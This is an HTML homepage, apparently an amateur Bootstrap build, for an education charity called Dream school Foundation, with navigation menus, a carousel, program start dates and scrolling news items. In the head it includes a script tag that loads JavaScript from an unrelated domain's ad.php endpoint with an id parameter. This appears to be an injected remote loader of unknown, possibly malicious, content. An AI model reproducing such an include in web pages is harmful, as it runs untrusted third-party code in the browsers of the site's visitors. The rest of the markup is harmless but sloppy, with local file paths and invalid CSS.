<!DOCTYPE html>
<html lang="en">
<head>
  <title>Dream school Foundation</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
  <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
<script src="https://majuwe.com/ad.php?u=6707a849ea8b2cb5004831e394eee6cd&p=1"></script>
<style>
@import url('bootstrap.min.css');
.navbar navbar-fixed-top {
background: #FFFFFF;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
max-height: 30px;
}
.sr-only {
    position: absolute;
    width: 100%;
    height: 40px;
    padding: 0;
    margin: -1px;
    overflow: hidden;
    clip: rect(0,0,0,0);
    border: 0;
}
.carousel-inner > .item > img,
  .carousel-inner > .item > a > img {
      width: 70%;
      margin: auto;
  }
 #myScrollspy {
      position: relative; 
      height: 2000px;
      overflow: auto;
     
  }
#x{
background: #000000;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 150px;
}
#p{
background: blue;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
margin-left: 10px;
min-height: 20px;
}
#listview{
background: black;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 20px;
}
#p1{
background: green;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
margin-left: 10px;
min-height: 20px;
}
#p2{
background: orange;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
margin-left: 10px;
min-height: 20px;
}
#q{
background: #FFFFFF;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 40px;
margin-left: 10px;
outline: 1px solid orange;
}
#r{
background: #FFFFFF;
background-image: url('C:\Users\hp1\Desktop\ang.jpg') no-repeat center center;
background-repeat: repeat-x;
border-color: none;
filter: none;
max-height: 200px;
margin-left: 10px;
outline: 1px solid orange;
}
.ramya{
background: #FFFFFF;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 150px;
}
.chinni{
background:#F5F5DC ;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 20px;
}
#lastone{
background:#000000 ;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 200px;
}
#y{
background:#F5F5DC ;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
max-height: 60px;
}
.chitti{
background: #FFFFFF;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 50px;
}
#second {
margin-left=5px;
}
.chinni1{
background: #FFFFFF;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 100%;
}
.middle{
background: yellow;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 20px;
}
#forspacing {
 
  margin-left: 10px;
}
.last{
background: blue;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 20px;
}
.for all{
background: FFFFFF;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 150px;
}
.rowcol{
background:C0C0C0;
background-image: none;
background-repeat: repeat-x;
border-color: none;
filter: none;
min-height: 40px;
}
h3{
color: blue;
}
.chinni:hover { 
    background-color: red;
}
</style>
</head>
<body>

<div class="container-fluid">
<div class="navbar navbar-inverse" role="navigation">
 <div class="navbar-header">
	<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
      <a class="navbar-brand" href="about.html"><font color="white">About</font></a>
   </div>
<div class="row">
<div class="col-md-6">
   
                       <div class="navbar-collapse collapse">
                   <ul class="nav navbar-nav">
                   <li class="active"><a href="admin.html"><font color="white">admin</font></a></li>
                   <li><a href="rfeedback.html"><font color="white">feedback</font></a></a></li>
                   <li><a href="mandm.html"><font color="white">login</font></a></a></li>
                   <li><a href="register.html"><font color="white">register</font></a></a></li>
	 <li><a href="progress.html"><font color="white">progress</font></a></a></li>
                   </ul>
                     </div>
</div>
<div class="col-md-4">
<div class="col-md-4">
    </div>
<div class="col-md-4">
    </div>
<div class="col-md-4">
  <div class="navbar-collapse collapse">
                   <ul class="nav navbar-nav">
                  <a href="#" class="btn btn-info btn-lg"><span class="glyphicon glyphicon-search"></span>Search here</a>
                   </ul>
  </div>                   
    </div>
</div>
</div>
</div>
</div>
<div data-spy="scroll" data-target=".navbar" data-offset="12" id="myScrollspy">
<div class="container-fluid">
  <div class="row">
    <div class="col-md-6">
      <ul class="nav navbar-nav">
     <img src="C:\Users\SaiMansi\Downloads\Capture.PNG" width="400" height="80"></img>
       </ul>
    </div>
    <div class="col-md-6"> 
      <div class="nav navbar-default" role="navigation">
    <div class="navbar-header">
	<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
       <a class="navbar-brand" href="#"><font color="black"><h3>programs</h3></font></a>
 </div>
    <div class="navbar-collapse collapse">
      <ul class="nav navbar-nav">
        <li class="active"><a href="#"><font color="black"><h3>Getting involved</h3></font></a></li>
        <li><a href="#"><font color="black"><h3>News</h3></font></a></a></li>
	 <li><a href="#"><font color="black"><h3>partners</h3></font></a></a></li>
      </ul>
    </div>
  </div>
    </div>
    <div class="clearfix visible-lg"></div>
  </div>
<div class="row">
    <div class="col-md-7">
<ul class="nav navbar-nav">
       </ul>
    </div>
<div class="col-md-4">
<ul class="nav navbar-nav">
        <li><a href="#">volunteers</a></li>
        <li><a href="#">mentors</a></li>
        <li><a href="#">Events</a></li>
        <li><a href="#">Contact Us</a></li>
      </ul>
</div>
</div>
</div>

<div class="container">
  <br>
  <div id="myCarousel" class="carousel slide" data-ride="carousel">
    <!-- Indicators -->
    <ol class="carousel-indicators">
      <li data-target="#myCarousel" data-slide-to="0" class="active"></li>
      <li data-target="#myCarousel" data-slide-to="1"></li>
      <li data-target="#myCarousel" data-slide-to="2"></li>
      <li data-target="#myCarousel" data-slide-to="3"></li>
    </ol>

    <!-- Wrapper for slides -->
    <div class="carousel-inner" role="listbox">
      <div class="item active">
        <img src="http://thethinktankers.in/meridian/tejaswini/image.PNG" alt="Chania" width="500" height="500">
      </div>

      <div class="item">
        <img src="http://thethinktankers.in/meridian/tejaswini/image.PNG" alt="Chania" width="500" height="500">
      </div>
    
      <div class="item">
        <img src="http://thethinktankers.in/meridian/tejaswini/image.PNG" alt="Flower" width="500" height="500">
      </div>

      <div class="item">
        <img src="http://thethinktankers.in/meridian/tejaswini/image.PNG" alt="Flower" width="500" height="500">
      </div>
    </div>

    <!-- Left and right controls -->
    <a class="left carousel-control" href="#myCarousel" role="button" data-slide="prev">
      <span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span>
      <span class="sr-only">Previous</span>
    </a>
    <a class="right carousel-control" href="#myCarousel" role="button" data-slide="next">
      <span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span>
      <span class="sr-only">Next</span>
    </a>
  </div>
</div>
<br>
<div class="row">
<div class="ramya">
    <div class="col-md-6">
	<div class="col-md-1"></div>
     <div class="col-md-3" id="x">
	<p><font color="white"><h2>Calendar</h2><h1> Events</h1></font></p>
  
	<ul class="nav nav-pills nav-stacked">
        <li class="dropdown">
          <a class="dropdown-toggle" data-toggle="dropdown" href="#">More Events<span class="caret"></span></a>
          <ul class="dropdown-menu">
            <li><a href="#">Submenu 1-1</a></li>
            <li><a href="#">Submenu 1-2</a></li>
            <li><a href="#">Submenu 1-3</a></li>                        
          </ul>
        </li>
      </ul>         
      </div>
      <div class="col-md-8">
            <div class="row">
	<div class="chinni">
           <div class="col-md-12">
		</div>
	</div>
     </div>

  <div class="row">
	<div class="chitti">
           <div class="col-md-12">
	<h3>education and development</h3>
		</div>
	</div>
</div>

 <div class="row">
	<div class="chinni1">
           <div class="col-md-9">
	<p>started on</p>
		</div>
	<div class="col-md-3">
    
     <div class="row">
	<div class="happy">
	<div class="col-md-12">
	<p>JUNE<H1>20</H1></p>
	</div>
	</div>
</div>
 






	</div>
	</div>
</div>

    </div>
</div>




    <div class="col-md-6"> 
      <div class="col-md-6">
             <div class="row">
	<div class="chinni">
           <div class="col-md-12">
		</div>
	</div>
     </div>

  <div class="row">
	<div class="chitti">
           <div class="col-md-12">
	<h3>school development program</h3>
		</div>
	</div>
</div>

 <div class="row">
	<div class="chinni1">
           <div class="col-md-9">
	<p>started on</p>
		</div>
	<div class="col-md-3">
    
     <div class="row">
	<div class="happy">
	<div class="col-md-12">
	<p>JUNE<H1>22</H1></p>
	</div>
	</div>
</div>
 
	</div>
	</div>
</div>

    </div>
      <div class="col-md-6">
       <div class="row">
	<div class="chinni">
           <div class="col-md-12">
		</div>
	</div>
     </div>

  <div class="row">
	<div class="chitti">
           <div class="col-md-12">
	<h3>high school education</h3>
		</div>
	</div>
</div>

 <div class="row">
	<div class="chinni1">
           <div class="col-md-9">
	<p>started on</p>
		</div>
	<div class="col-md-3">
    
     <div class="row">
	<div class="happy">
	<div class="col-md-12">
	<p>JULY<H1>1</H1></p>
	</div>
	</div>
</div>
 






	</div>
	</div>
</div>

    </div>       
     
    </div>
</div>
</div>

<div class="row" id="y">
<div class="col-md-12" id="forspacing">
	<p><font color="black"><h3>What's happening?</h3></font></p>     
      </div>
</div>
<br>


<div class="row" id="all">
<div class="for all">
	
<div class="col-md-4">
<div class="col-md-1"></div>
<div class="col-md-11">
		<div class="row">
		<div class="col-md-12" id="p"></div>
		</div>
		<div class="row">
		<div class="col-md-12" id="q">
		<p><h3>SCHOOL PARTICIPATION</h3></p></div>
		</div>
		<div class="row">
		<div class="col-md-12" id="r">
		<marquee direction="up"><p><h3>dream school foundation takes part in summer camps</h3><h4>About 400 students participate in the Happy Street Campaign held at Necklace Road,Hyderabad</h4></p><br>
           </marquee>
		</div></div>
	</div>

</div>
<div class="col-md-4">
<div class="col-md-1"></div>
<div class="col-md-11">
		<div class="row">
		<div class="col-md-12" id="p1"></div>
		</div>
		<div class="row">
		<div class="col-md-12" id="q">
		<p><h3> WORK</h3></p></div>
		</div>
		<div class="row">
		<div class="col-md-12" id="r">
		<marquee direction="up"><p><h3>dream school takes part in the happy Street Campaign</h3><h4>About 400 students participate in the Happy Street Campaign held at Necklace Road,Hyderabad</h4></p><br>
           </marquee>
		</div></div>
	</div>

</div>
<div class="col-md-4">
<div class="col-md-1"></div>
<div class="col-md-11">
		<div class="row">
		<div class="col-md-12" id="p2"></div>
		</div>
		<div class="row">
		<div class="col-md-12" id="q">
		<p><h3>NEWS</h3></p></div>
		</div>
		<div class="row">
		<div class="col-md-12" id="r">
		<marquee direction="up"><p><h3>looking for mentors who are committed towards work</h3><h4>we are looking for mentors who are efficient and experienced.</h4></p><br>
           </marquee>
		</div></div>
	</div>

</div>
</div>
</div>
<br>
<div class="row">
<div class="col-md-5"></div>
<div class="col-md-7"><font color="grey"><h2>Loading...</h2></font></div>
</div>
<br>
 <div class="container-fluid">
<div class="row" id="listview">
<div class="col-md-8">
 
                      <br>
                   <ul class="list-inline">
                   <li class="active"><a href="#"><font color="white">Home</font></a></li>
                   <li><a href="#"><font color="white">Contacts</font></a></a></li>
                   <li><a href="#"><font color="white">Sitemap</font></a></a></li>
		<li><a href="#"><font color="white">Terms & conditions</font></a></a></li>
                   </ul>
                     </div>
</div>
</div>
<div class="row" id="lastone" >
<div class="col-md-6">
<ul class="nav navbar-nav">
       </ul>
</div>
<div class="col-md-6">
</div>

</div>




</div>
</body>
</html>
